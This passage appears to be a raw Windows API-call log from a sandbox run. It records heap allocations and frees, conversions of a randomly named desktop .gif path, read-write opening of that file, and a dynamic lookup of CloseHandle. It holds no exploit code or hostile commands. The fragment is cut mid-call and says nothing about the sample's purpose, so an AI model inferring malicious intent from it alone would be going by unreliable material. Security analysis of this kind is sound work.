lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0164.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4c) returned 0x923ad0 [0164.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif", cchWideChar=76, lpMultiByteStr=0x923ad0, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif", lpUsedDefaultChar=0x0) returned 76 [0164.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0164.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0164.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0164.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0164.532] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\jlq6tymoaaqj7b5t.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0164.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0164.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0164.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0164.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0164.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0164.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0164.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0164.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0164.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0164.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=76, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0164.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x98) returned 0x8feba8 [0164.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=76, lpWideCharStr=0x8feba8, cchWideChar=76 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif") returned 76 [0164.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0164.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0164.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0164.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0164.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0164.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0164.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0164.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0164.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0164.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0164.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0164.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0164.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0164.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0164.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0164.536] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0164.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0164.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0164.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0164.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0164.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0164.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0164.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.538] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0164.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0164.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0164.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0164.538] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0164.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0164.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0164.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0164.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0164.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0164.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0164.539] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0164.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0164.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0164.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0164.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0164.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0164.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0164.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.539] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0164.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0164.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0164.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd4b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0164.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0164.540] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0164.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0164.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0164.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0164.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0164.540] CloseHandle (hObject=0x120) returned 1 [0164.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0164.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0164.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0164.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0164.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0164.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0164.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0164.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0164.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0164.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0164.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0164.541] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: 